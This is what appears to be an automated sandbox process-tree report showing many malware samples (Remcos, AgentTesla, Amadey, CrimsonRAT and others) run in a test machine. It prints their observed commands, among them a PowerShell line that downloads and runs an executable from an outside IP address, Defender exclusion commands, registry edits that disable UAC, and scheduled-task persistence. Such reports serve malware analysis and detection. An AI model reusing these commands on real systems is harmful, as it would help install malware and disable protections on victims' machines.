                                              "schtasks" /create /tn "Runtime Broker" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\SubDir\Client.exe" /rl HIGHEST /f
                                              7⤵
                                              • Scheduled Task/Job: Scheduled Task
                                              PID:4460
                                            • C:\Windows\SysWOW64\cmd.exe
                                              cmd /c ""C:\Users\Admin\AppData\Local\Temp\wSbGzNrClVuH.bat" "
                                              7⤵
                                                PID:5148
                                                • C:\Windows\SysWOW64\chcp.com
                                                  chcp 65001
                                                  8⤵
                                                    PID:7080
                                                  • C:\Windows\SysWOW64\PING.EXE
                                                    ping -n 10 localhost
                                                    8⤵
                                                    • System Network Configuration Discovery: Internet Connection Discovery
                                                    • Runs ping.exe
                                                    PID:892
                                                  • C:\Users\Admin\AppData\Roaming\SubDir\Client.exe
                                                    "C:\Users\Admin\AppData\Roaming\SubDir\Client.exe"
                                                    8⤵
                                                      PID:3560
                                          • C:\Users\Admin\AppData\Local\Temp\amadey.exe
                                            "C:\Users\Admin\AppData\Local\Temp\amadey.exe"
                                            3⤵
                                            • Executes dropped EXE
                                            • Loads dropped DLL
                                            • System Location Discovery: System Language Discovery
                                            PID:1856
                                            • C:\ProgramData\a5410c88f1\bween.exe
                                              "C:\ProgramData\a5410c88f1\bween.exe"
                                              4⤵
                                              • Executes dropped EXE
                                              PID:1832
                                              • C:\Windows\SysWOW64\cmd.exe
                                                "C:\Windows\System32\cmd.exe" /C REG ADD "HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders" /f /v Startup /t REG_SZ /d C:\ProgramData\a5410c88f1\
                                                5⤵
                                                • System Location Discovery: System Language Discovery
                                                PID:3972
                                                • C:\Windows\SysWOW64\reg.exe
                                                  REG ADD "HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders" /f /v Startup /t REG_SZ /d C:\ProgramData\a5410c88f1\
                                                  6⤵
                                                  • System Location Discovery: System Language Discovery
                                                  PID:3000
                                          • C:\Users\Admin\AppData\Local\Temp\AgentTesla.exe
                                            "C:\Users\Admin\AppData\Local\Temp\AgentTesla.exe"
                                            3⤵
                                            • Executes dropped EXE
                                            • Drops file in Program Files directory
                                            • System Location Discovery: System Language Discovery
                                            PID:2216
                                          • C:\Users\Admin\AppData\Local\Temp\EliteMonitor.exe
                                            "C:\Users\Admin\AppData\Local\Temp\EliteMonitor.exe"
                                            3⤵
                                            • Executes dropped EXE
                                            • Loads dropped DLL
                                            • System Location Discovery: System Language Discovery
                                            PID:1640
                                            • C:\Users\Admin\AppData\Local\Temp\EliteMonitor.exe
                                              "C:\Users\Admin\AppData\Local\Temp\EliteMonitor.exe"
                                              4⤵
                                              • Checks BIOS information in registry
                                              • Executes dropped EXE
                                              • System Location Discovery: System Language Discovery
                                              • Modifies registry class
                                              • NTFS ADS
                                              PID:2472
                                              • C:\Users\Admin\AppData\Local\Temp\setup-25031953484.exe
                                                C:\Users\Admin\AppData\Local\Temp\\setup-25031953484.exe
                                                5⤵
                                                • Executes dropped EXE
                                                • System Location Discovery: System Language Discovery
                                                PID:3292
                                          • C:\Users\Admin\AppData\Local\Temp\CrimsonRAT.exe
                                            "C:\Users\Admin\AppData\Local\Temp\CrimsonRAT.exe"
                                            3⤵
                                            • Executes dropped EXE
                                            • Drops file in Program Files directory
                                            PID:1988
                                            • C:\ProgramData\Hdlharas\dlrarhsiva.exe
                                              "C:\ProgramData\Hdlharas\dlrarhsiva.exe"
                                              4⤵
                                              • Executes dropped EXE
                                              PID:4452
                                          • C:\Users\Admin\AppData\Local\Temp\Backdoor.Win32.Rbot.aal.exe
                                            "C:\Users\Admin\AppData\Local\Temp\Backdoor.Win32.Rbot.aal.exe"
                                            3⤵
                                            • Executes dropped EXE
                                            PID:552
                                          • C:\Users\Admin\AppData\Local\Temp\cf9c950bc1e2f9cc01c4fa6a83d47227e6c0927c31d0cdb165c7799728cbea85.exe
                                            "C:\Users\Admin\AppData\Local\Temp\cf9c950bc1e2f9cc01c4fa6a83d47227e6c0927c31d0cdb165c7799728cbea85.exe"
                                            3⤵
                                            • Executes dropped EXE
                                            • Loads dropped DLL
                                            PID:880
                                            • C:\Users\Admin\AppData\Local\Temp\cf9c950bc1e2f9cc01c4fa6a83d47227e6c0927c31d0cdb165c7799728cbea85.exe
                                              "C:\Users\Admin\AppData\Local\Temp\cf9c950bc1e2f9cc01c4fa6a83d47227e6c0927c31d0cdb165c7799728cbea85.exe"
                                              4⤵
                                              • Executes dropped EXE
                                              • Loads dropped DLL
                                              PID:1604
                                          • C:\Users\Admin\AppData\Local\Temp\DISCORD BIRTHDAY NITRO CLAIMER.exe
                                            "C:\Users\Admin\AppData\Local\Temp\DISCORD BIRTHDAY NITRO CLAIMER.exe"
                                            3⤵
                                            • Executes dropped EXE
                                            • Loads dropped DLL
                                            PID:988
                                            • C:\Users\Admin\AppData\Local\Temp\DISCORD BIRTHDAY NITRO CLAIMER.exe
                                              "C:\Users\Admin\AppData\Local\Temp\DISCORD BIRTHDAY NITRO CLAIMER.exe"
                                              4⤵
                                              • Executes dropped EXE
                                              • Loads dropped DLL
                                              PID:2852
                                          • C:\Users\Admin\AppData\Local\Temp\Discord Free Nitros.exe
                                            "C:\Users\Admin\AppData\Local\Temp\Discord Free Nitros.exe"
                                            3⤵
                                            • Executes dropped EXE
                                            PID:2052
                                            • C:\Windows\System32\schtasks.exe
                                              "C:\Windows\System32\schtasks.exe" /create /f /sc ONLOGON /RL HIGHEST /tn "'Minecraft"' /tr "'C:\Users\Admin\AppData\Roaming\Minecraft.exe"'
                                              4⤵
                                              • Scheduled Task/Job: Scheduled Task
                                              PID:8180
                                            • C:\Windows\system32\cmd.exe
                                              cmd /c ""C:\Users\Admin\AppData\Local\Temp\tmp83EF.tmp.bat""
                                              4⤵
                                                PID:2376
                                                • C:\Windows\system32\timeout.exe
                                                  timeout 3
                                                  5⤵
                                                  • Delays execution with timeout.exe
                                                  PID:4508
                                                • C:\Users\Admin\AppData\Roaming\Minecraft.exe
                                                  "C:\Users\Admin\AppData\Roaming\Minecraft.exe"
                                                  5⤵
                                                    PID:7232
                                              • C:\Users\Admin\AppData\Local\Temp\Discord Nitro Checker by Unheilgott (1).exe
                                                "C:\Users\Admin\AppData\Local\Temp\Discord Nitro Checker by Unheilgott (1).exe"
                                                3⤵
                                                • Executes dropped EXE
                                                PID:2600
                                              • C:\Users\Admin\AppData\Local\Temp\LoveForyou.scr
                                                "C:\Users\Admin\AppData\Local\Temp\LoveForyou.scr" /S
                                                3⤵
                                                • Modifies firewall policy service
                                                • UAC bypass
                                                • Windows security bypass
                                                • Executes dropped EXE
                                                • Windows security modification
                                                • Checks whether UAC is enabled
                                                • Enumerates connected drives
                                                • Drops file in Windows directory
                                                • System Location Discovery: System Language Discovery
                                                • Suspicious use of AdjustPrivilegeToken
                                                • System policy modification
                                                PID:2956
                                                • C:\Users\Admin\AppData\Local\Temp\RarSFX1\love.exe
                                                  "C:\Users\Admin\AppData\Local\Temp\RarSFX1\love.exe" /S
                                                  4⤵
                                                  • Executes dropped EXE
                                                  • System Location Discovery: System Language Discovery
                                                  PID:4016
                                                  • C:\Users\Admin\AppData\Local\server.exe
                                                    "C:\Users\Admin\AppData\Local\server.exe"
                                                    5⤵
                                                    • Boot or Logon Autostart Execution: Active Setup
                                                    • Executes dropped EXE
                                                    • Adds Run key to start application
                                                    PID:3544
                                                • C:\Users\Admin\AppData\Local\Temp\RarSFX1\ForYou.exe
                                                  "C:\Users\Admin\AppData\Local\Temp\RarSFX1\ForYou.exe" /S
                                                  4⤵
                                                  • Executes dropped EXE
                                                  • System Location Discovery: System Language Discovery
                                                  PID:3288
                                              • C:\Users\Admin\AppData\Local\Temp\Lokibot.exe
                                                "C:\Users\Admin\AppData\Local\Temp\Lokibot.exe"
                                                3⤵
                                                • Executes dropped EXE
                                                • System Location Discovery: System Language Discovery
                                                • Suspicious use of AdjustPrivilegeToken
                                                PID:2312
                                                • C:\Users\Admin\AppData\Local\Temp\Lokibot.exe
                                                  "C:\Users\Admin\AppData\Local\Temp\Lokibot.exe"
                                                  4⤵
                                                    PID:3860
                                                • C:\Users\Admin\AppData\Local\Temp\New Text Document mod.exe
                                                  "C:\Users\Admin\AppData\Local\Temp\New Text Document mod.exe"
                                                  3⤵
                                                  • Executes dropped EXE
                                                  • Adds Run key to start application
                                                  • System Location Discovery: System Language Discovery
                                                  PID:3820
                                                  • C:\Users\Admin\AppData\Local\Temp\._cache_New Text Document mod.exe
                                                    "C:\Users\Admin\AppData\Local\Temp\._cache_New Text Document mod.exe"
                                                    4⤵
                                                    • Downloads MZ/PE file
                                                    • Executes dropped EXE
                                                    • Modifies system certificate store
                                                    PID:3368
                                                    • C:\Users\Admin\AppData\Local\Temp\a\g354ff43hj67.exe
                                                      "C:\Users\Admin\AppData\Local\Temp\a\g354ff43hj67.exe"
                                                      5⤵
                                                        PID:6956
                                                        • C:\Windows\system32\cmd.exe
                                                          cmd /c ""C:\Users\Admin\AppData\Local\Temp\main\main.bat" /S"
                                                          6⤵
                                                            PID:8044
                                                            • C:\Windows\system32\mode.com
                                                              mode 65,10
                                                              7⤵
                                                                PID:4944
                                                              • C:\Users\Admin\AppData\Local\Temp\main\7z.exe
                                                                7z.exe e file.zip -p1697420900235384164176743894 -oextracted
                                                                7⤵
                                                                  PID:5560
                                                                • C:\Users\Admin\AppData\Local\Temp\main\7z.exe
                                                                  7z.exe e extracted/file_5.zip -oextracted
                                                                  7⤵
                                                                    PID:2136
                                                                  • C:\Users\Admin\AppData\Local\Temp\main\7z.exe
                                                                    7z.exe e extracted/file_4.zip -oextracted
                                                                    7⤵
                                                                      PID:4488
                                                                    • C:\Users\Admin\AppData\Local\Temp\main\7z.exe
                                                                      7z.exe e extracted/file_3.zip -oextracted
                                                                      7⤵
                                                                        PID:6008
                                                                      • C:\Users\Admin\AppData\Local\Temp\main\7z.exe
                                                                        7z.exe e extracted/file_2.zip -oextracted
                                                                        7⤵
                                                                          PID:5976
                                                                        • C:\Users\Admin\AppData\Local\Temp\main\7z.exe
                                                                          7z.exe e extracted/file_1.zip -oextracted
                                                                          7⤵
                                                                            PID:5868
                                                                          • C:\Windows\system32\attrib.exe
                                                                            attrib +H "svchosts64.exe"
                                                                            7⤵
                                                                            • Views/modifies file attributes
                                                                            PID:7052
                                                                          • C:\Users\Admin\AppData\Local\Temp\main\svchosts64.exe
                                                                            "svchosts64.exe"
                                                                            7⤵
                                                                              PID:5492
                                                                        • C:\Users\Admin\AppData\Local\Temp\a\jajajdva.exe
                                                                          "C:\Users\Admin\AppData\Local\Temp\a\jajajdva.exe"
                                                                          5⤵
                                                                            PID:7128
                                                                          • C:\Users\Admin\AppData\Local\Temp\a\setup.exe
                                                                            "C:\Users\Admin\AppData\Local\Temp\a\setup.exe"
                                                                            5⤵
                                                                              PID:7652
                                                                            • C:\Users\Admin\AppData\Local\Temp\a\ChromeUpdate.exe
                                                                              "C:\Users\Admin\AppData\Local\Temp\a\ChromeUpdate.exe"
                                                                              5⤵
                                                                                PID:5904
                                                                              • C:\Users\Admin\AppData\Local\Temp\a\loader.exe
                                                                                "C:\Users\Admin\AppData\Local\Temp\a\loader.exe"
                                                                                5⤵
                                                                                  PID:7896
                                                                                • C:\Users\Admin\AppData\Local\Temp\a\shwork.exe
                                                                                  "C:\Users\Admin\AppData\Local\Temp\a\shwork.exe"
                                                                                  5⤵
                                                                                    PID:4428
                                                                                • C:\ProgramData\Synaptics\Synaptics.exe
                                                                                  "C:\ProgramData\Synaptics\Synaptics.exe" InjUpdate
                                                                                  4⤵
                                                                                  • Executes dropped EXE
                                                                                  • System Location Discovery: System Language Discovery
                                                                                  PID:4080
                                                                                  • C:\Users\Admin\AppData\Local\Temp\._cache_Synaptics.exe
                                                                                    "C:\Users\Admin\AppData\Local\Temp\._cache_Synaptics.exe" InjUpdate
                                                                                    5⤵
                                                                                      PID:5656
                                                                                      • C:\Users\Admin\AppData\Local\Temp\a\roblox_protected.exe
                                                                                        "C:\Users\Admin\AppData\Local\Temp\a\roblox_protected.exe"
                                                                                        6⤵
                                                                                          PID:7076
                                                                                          • C:\Windows\SysWOW64\cmd.exe
                                                                                            "C:\Windows\System32\cmd.exe" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Temp\a\roblox_protected.exe"
                                                                                            7⤵
                                                                                              PID:1544
                                                                                              • C:\Windows\SysWOW64\choice.exe
                                                                                                choice /C Y /N /D Y /T 3
                                                                                                8⤵
                                                                                                  PID:6604
                                                                                            • C:\Users\Admin\AppData\Local\Temp\a\crypted.exe
                                                                                              "C:\Users\Admin\AppData\Local\Temp\a\crypted.exe"
                                                                                              6⤵
                                                                                                PID:7352
                                                                                                • C:\Users\Admin\AppData\Local\Temp\a\crypted.exe
                                                                                                  "C:\Users\Admin\AppData\Local\Temp\a\crypted.exe"
                                                                                                  7⤵
                                                                                                    PID:7428
                                                                                                    • C:\Windows\SysWOW64\cmd.exe
                                                                                                      "C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "dJ3H492fymd.exe" /tr '"C:\Users\Admin\AppData\Local\Temp\TkEsyhMyLtSDFBh\dJ3H492fymd.exe.exe"' & exit
                                                                                                      8⤵
                                                                                                        PID:8136
                                                                                                        • C:\Windows\SysWOW64\schtasks.exe
                                                                                                          schtasks /create /f /sc onlogon /rl highest /tn "dJ3H492fymd.exe" /tr '"C:\Users\Admin\AppData\Local\Temp\TkEsyhMyLtSDFBh\dJ3H492fymd.exe.exe"'
                                                                                                          9⤵
                                                                                                          • Scheduled Task/Job: Scheduled Task
                                                                                                          PID:752
                                                                                                      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoProfile -ExecutionPolicy Bypass -Command " $action = New-ScheduledTaskAction -Execute 'C:\Users\Admin\AppData\Local\Temp\TkEsyhMyLtSDFBh\dJ3H492fymd.exe.exe' $trigger = New-ScheduledTaskTrigger -AtLogOn Register-ScheduledTask -Action $action -Trigger $trigger -TaskName 'dJ3H492fymd.exe-5707' -RunLevel Highest "
                                                                                                        8⤵
                                                                                                        • Command and Scripting Interpreter: PowerShell
                                                                                                        PID:2720
                                                                                                    • C:\Windows\SysWOW64\WerFault.exe
                                                                                                      C:\Windows\SysWOW64\WerFault.exe -u -p 7352 -s 512
                                                                                                      7⤵
                                                                                                      • Program crash
                                                                                                      PID:7492
                                                                                                  • C:\Users\Admin\AppData\Local\Temp\a\system.exe
                                                                                                    "C:\Users\Admin\AppData\Local\Temp\a\system.exe"
                                                                                                    6⤵
                                                                                                      PID:7552
                                                                                                      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\a\system.exe'
                                                                                                        7⤵
                                                                                                        • Command and Scripting Interpreter: PowerShell
                                                                                                        PID:4676
                                                                                                      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'system.exe'
                                                                                                        7⤵
                                                                                                        • Command and Scripting Interpreter: PowerShell
                                                                                                        PID:7744
                                                                                                      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming\WindowsSessionUpdate'
                                                                                                        7⤵
                                                                                                        • Command and Scripting Interpreter: PowerShell
                                                                                                        PID:6140
                                                                                                      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'WindowsSessionUpdate'
                                                                                                        7⤵
                                                                                                        • Command and Scripting Interpreter: PowerShell
                                                                                                        PID:5560
                                                                                                      • C:\Windows\System32\schtasks.exe
                                                                                                        "C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "WindowsSessionUpdate" /tr "C:\Users\Admin\AppData\Roaming\WindowsSessionUpdate"
                                                                                                        7⤵
                                                                                                        • Scheduled Task/Job: Scheduled Task
                                                                                                        PID:6808
                                                                                                    • C:\Users\Admin\AppData\Local\Temp\a\sCIPrhZt5Yub9qL.exe
                                                                                                      "C:\Users\Admin\AppData\Local\Temp\a\sCIPrhZt5Yub9qL.exe"
                                                                                                      6⤵
                                                                                                        PID:6524
                                                                                                        • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                          "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp\a\sCIPrhZt5Yub9qL.exe"
                                                                                                          7⤵
                                                                                                          • Command and Scripting Interpreter: PowerShell
                                                                                                          PID:7052
                                                                                                        • C:\Users\Admin\AppData\Local\Temp\a\sCIPrhZt5Yub9qL.exe
                                                                                                          "C:\Users\Admin\AppData\Local\Temp\a\sCIPrhZt5Yub9qL.exe"
                                                                                                          7⤵
                                                                                                            PID:3080
                                                                                                        • C:\Users\Admin\AppData\Local\Temp\a\VixenLoader.exe
                                                                                                          "C:\Users\Admin\AppData\Local\Temp\a\VixenLoader.exe"
                                                                                                          6⤵
                                                                                                            PID:3196
                                                                                                            • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                              "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Program Files\taskhostw.exe'
                                                                                                              7⤵
                                                                                                              • Command and Scripting Interpreter: PowerShell
                                                                                                              PID:3764
                                                                                                            • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                              "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'taskhostw.exe'
                                                                                                              7⤵
                                                                                                              • Command and Scripting Interpreter: PowerShell
                                                                                                              PID:7192
                                                                                                            • C:\Windows\system32\cmd.exe
                                                                                                              cmd /c ""C:\Users\Admin\AppData\Local\Temp\tmpB2EB.tmp.bat""
                                                                                                              7⤵
                                                                                                                PID:4196
                                                                                                                • C:\Windows\system32\timeout.exe
                                                                                                                  timeout 3
                                                                                                                  8⤵
                                                                                                                  • Delays execution with timeout.exe
                                                                                                                  PID:8180
                                                                                                      • C:\Users\Admin\AppData\Local\Temp\malware.exe
                                                                                                        "C:\Users\Admin\AppData\Local\Temp\malware.exe"
                                                                                                        3⤵
                                                                                                        • Executes dropped EXE
                                                                                                        • System Location Discovery: System Language Discovery
                                                                                                        PID:3880
                                                                                                        • C:\Windows\SysWOW64\WerFault.exe
                                                                                                          C:\Windows\SysWOW64\WerFault.exe -u -p 3880 -s 56
                                                                                                          4⤵
                                                                                                          • Program crash
                                                                                                          PID:3912
                                                                                                      • C:\Users\Admin\AppData\Local\Temp\VirusShare_fff8783b7567821cec8838d075d247e1.exe
                                                                                                        "C:\Users\Admin\AppData\Local\Temp\VirusShare_fff8783b7567821cec8838d075d247e1.exe"
                                                                                                        3⤵
                                                                                                        • Executes dropped EXE
                                                                                                        • System Location Discovery: System Language Discovery
                                                                                                        PID:1152
                                                                                                      • C:\Users\Admin\AppData\Local\Temp\SteamOBrute.exe
                                                                                                        "C:\Users\Admin\AppData\Local\Temp\SteamOBrute.exe"
                                                                                                        3⤵
                                                                                                        • Executes dropped EXE
                                                                                                        • Writes to the Master Boot Record (MBR)
                                                                                                        • System Location Discovery: System Language Discovery
                                                                                                        • Modifies registry class
                                                                                                        • Suspicious use of FindShellTrayWindow
                                                                                                        • Suspicious use of SendNotifyMessage
                                                                                                        • Suspicious use of SetWindowsHookEx
                                                                                                        PID:2672
                                                                                                      • C:\Users\Admin\AppData\Local\Temp\NetWire.exe
                                                                                                        "C:\Users\Admin\AppData\Local\Temp\NetWire.exe"
                                                                                                        3⤵
                                                                                                        • Executes dropped EXE
                                                                                                        • System Location Discovery: System Language Discovery
                                                                                                        PID:3076
                                                                                                        • C:\Users\Admin\AppData\Local\Temp\NetWire.exe
                                                                                                          "C:\Users\Admin\AppData\Local\Temp\NetWire.exe"
                                                                                                          4⤵
                                                                                                          • Executes dropped EXE
                                                                                                          • System Location Discovery: System Language Discovery
                                                                                                          PID:3184
                                                                                                      • C:\Users\Admin\AppData\Local\Temp\VirusShare_0ac0c5dc1e706e301c8f902b78c41e3b.exe
                                                                                                        "C:\Users\Admin\AppData\Local\Temp\VirusShare_0ac0c5dc1e706e301c8f902b78c41e3b.exe"
                                                                                                        3⤵
                                                                                                        • Executes dropped EXE
                                                                                                        • System Location Discovery: System Language Discovery
                                                                                                        PID:3904
                                                                                                      • C:\Users\Admin\AppData\Local\Temp\TEAM BLUE CLIENT.exe
                                                                                                        "C:\Users\Admin\AppData\Local\Temp\TEAM BLUE CLIENT.exe"
                                                                                                        3⤵
                                                                                                        • Executes dropped EXE
                                                                                                        PID:2184
                                                                                                      • C:\Users\Admin\AppData\Local\Temp\Remcos.exe
                                                                                                        "C:\Users\Admin\AppData\Local\Temp\Remcos.exe"
                                                                                                        3⤵
                                                                                                        • Executes dropped EXE
                                                                                                        • Adds Run key to start application
                                                                                                        • Drops file in System32 directory
                                                                                                        • System Location Discovery: System Language Discovery
                                                                                                        PID:2180
                                                                                                        • C:\Windows\SysWOW64\cmd.exe
                                                                                                          /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f
                                                                                                          4⤵
                                                                                                          • System Location Discovery: System Language Discovery
                                                                                                          PID:2568
                                                                                                          • C:\Windows\SysWOW64\reg.exe
                                                                                                            C:\Windows\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f
                                                                                                            5⤵
                                                                                                            • UAC bypass
                                                                                                            • System Location Discovery: System Language Discovery
                                                                                                            • Modifies registry key
                                                                                                            PID:1612
                                                                                                        • C:\Windows\SysWOW64\cmd.exe
                                                                                                          cmd /c ""C:\Users\Admin\AppData\Local\Temp\install.bat" "
                                                                                                          4⤵
                                                                                                          • System Location Discovery: System Language Discovery
                                                                                                          PID:3828
                                                                                                          • C:\Windows\SysWOW64\PING.EXE
                                                                                                            PING 127.0.0.1 -n 2
                                                                                                            5⤵
                                                                                                            • System Location Discovery: System Language Discovery
                                                                                                            • System Network Configuration Discovery: Internet Connection Discovery
                                                                                                            • Runs ping.exe
                                                                                                            PID:3620
                                                                                                          • C:\Windows\SysWOW64\Userdata\Userdata.exe
                                                                                                            "C:\Windows\SysWOW64\Userdata\Userdata.exe"
                                                                                                            5⤵
                                                                                                            • Executes dropped EXE
                                                                                                            • Adds Run key to start application
                                                                                                            • Suspicious use of SetThreadContext
                                                                                                            • System Location Discovery: System Language Discovery
                                                                                                            PID:3868
                                                                                                            • C:\Windows\SysWOW64\cmd.exe
                                                                                                              /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f
                                                                                                              6⤵
                                                                                                              • System Location Discovery: System Language Discovery
                                                                                                              PID:2176
                                                                                                              • C:\Windows\SysWOW64\reg.exe
                                                                                                                C:\Windows\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f
                                                                                                                7⤵
                                                                                                                • UAC bypass
                                                                                                                • System Location Discovery: System Language Discovery
                                                                                                                • Modifies registry key
                                                                                                                PID:4356
                                                                                                            • C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                              "C:\Program Files (x86)\Internet Explorer\iexplore.exe"
                                                                                                              6⤵
                                                                                                              • System Location Discovery: System Language Discovery
                                                                                                              • Suspicious use of SetWindowsHookEx
                                                                                                              PID:2700
                                                                                                              • C:\Windows\SysWOW64\cmd.exe
                                                                                                                /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f
                                                                                                                7⤵
                                                                                                                • System Location Discovery: System Language Discovery
                                                                                                                PID:3444
                                                                                                                • C:\Windows\SysWOW64\reg.exe
                                                                                                                  C:\Windows\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f
                                                                                                                  8⤵
                                                                                                                  • UAC bypass
                                                                                                                  • System Location Discovery: System Language Discovery
                                                                                                                  • Modifies registry key
                                                                                                                  PID:4368
                                                                                                      • C:\Users\Admin\AppData\Local\Temp\Totally A Safe File.exe
                                                                                                        "C:\Users\Admin\AppData\Local\Temp\Totally A Safe File.exe"
                                                                                                        3⤵
                                                                                                        • Executes dropped EXE
                                                                                                        • System Location Discovery: System Language Discovery
                                                                                                        • Suspicious use of FindShellTrayWindow
                                                                                                        • Suspicious use of SendNotifyMessage
                                                                                                        PID:2512
                                                                                                        • C:\Windows\SysWOW64\cmd.exe
                                                                                                          C:\Windows\system32\cmd.exe /c schtasks /create /tn ZXLfkmaXHht /tr "mshta C:\Users\Admin\AppData\Local\Temp\HxopUaX4X.hta" /sc minute /mo 25 /ru "Admin" /f
                                                                                                          4⤵
                                                                                                          • System Location Discovery: System Language Discovery
                                                                                                          PID:4012
                                                                                                          • C:\Windows\SysWOW64\schtasks.exe
                                                                                                            schtasks /create /tn ZXLfkmaXHht /tr "mshta C:\Users\Admin\AppData\Local\Temp\HxopUaX4X.hta" /sc minute /mo 25 /ru "Admin" /f
                                                                                                            5⤵
                                                                                                            • System Location Discovery: System Language Discovery
                                                                                                            • Scheduled Task/Job: Scheduled Task
                                                                                                            PID:4232
                                                                                                        • C:\Windows\SysWOW64\mshta.exe
                                                                                                          mshta C:\Users\Admin\AppData\Local\Temp\HxopUaX4X.hta
                                                                                                          4⤵
                                                                                                          • System Location Discovery: System Language Discovery
                                                                                                          • Modifies Internet Explorer settings
                                                                                                          PID:2696
                                                                                                          • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                            "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'YYQWIWPY3XQQH0RKEC8MD5OYH8MUXBM8.EXE';(New-Object System.Net.WebClient).DownloadFile('http://176.113.115.7/mine/random.exe',$d);Start-Process $d;
                                                                                                            5⤵
                                                                                                            • Blocklisted process makes network request
                                                                                                            • Command and Scripting Interpreter: PowerShell
                                                                                                            • Downloads MZ/PE file
                                                                                                            • System Location Discovery: System Language Discovery
                                                                                                            PID:3668
                                                                                                            • C:\Users\Admin\AppData\Local\TempYYQWIWPY3XQQH0RKEC8MD5OYH8MUXBM8.EXE
                                                                                                              "C:\Users\Admin\AppData\Local\TempYYQWIWPY3XQQH0RKEC8MD5OYH8MUXBM8.EXE"
                                                                                                              6⤵
                                                                                                              • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                                                                                                              • Checks BIOS information in registry
                                                                                                              • Identifies Wine through registry keys
                                                                                                              • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                                                              • Drops file in Windows directory
                                                                                                              • System Location Discovery: System Language Discovery
                                                                                                              • Suspicious use of FindShellTrayWindow
                                                                                                              PID:5308
                                                                                                              • C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe
                                                                                                                "C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe"
                                                                                                                7⤵
                                                                                                                • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                                                                                                                • Checks BIOS information in registry
                                                                                                                • Identifies Wine through registry keys
                                                                                                                • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                                                                • System Location Discovery: System Language Discovery
                                                                                                                PID:5800
                                                                                                                • C:\Users\Admin\AppData\Local\Temp\10320830101\b0ad451079.exe
                                                                                                                  "C:\Users\Admin\AppData\Local\Temp\10320830101\b0ad451079.exe"
                                                                                                                  8⤵
                                                                                                                    PID:5040
                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\10325120101\RTH4oNP.exe
                                                                                                                    "C:\Users\Admin\AppData\Local\Temp\10325120101\RTH4oNP.exe"
                                                                                                                    8⤵
                                                                                                                      PID:7632
                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\10329270101\qWvzIGs.exe
                                                                                                                      "C:\Users\Admin\AppData\Local\Temp\10329270101\qWvzIGs.exe"
                                                                                                                      8⤵
                                                                                                                        PID:4172
                                                                                                            • C:\Users\Admin\AppData\Local\Temp\putty.exe
                                                                                                              "C:\Users\Admin\AppData\Local\Temp\putty.exe"
                                                                                                              3⤵
                                                                                                              • Executes dropped EXE
                                                                                                              • System Location Discovery: System Language Discovery
                                                                                                              PID:4008
                                                                                                              • C:\Windows\SysWOW64\cmd.exe
                                                                                                                cmd /c ""C:\Users\Admin\AppData\Local\Temp\451B.tmp\putty.bat" "C:\Users\Admin\AppData\Local\Temp\putty.exe""
                                                                                                                4⤵
                                                                                                                • System Location Discovery: System Language Discovery
                                                                                                                PID:1632
                                                                                                            • C:\Users\Admin\AppData\Local\Temp\TrollRAT.exe
                                                                                                              "C:\Users\Admin\AppData\Local\Temp\TrollRAT.exe"
                                                                                                              3⤵
                                                                                                              • Executes dropped EXE
                                                                                                              PID:2900
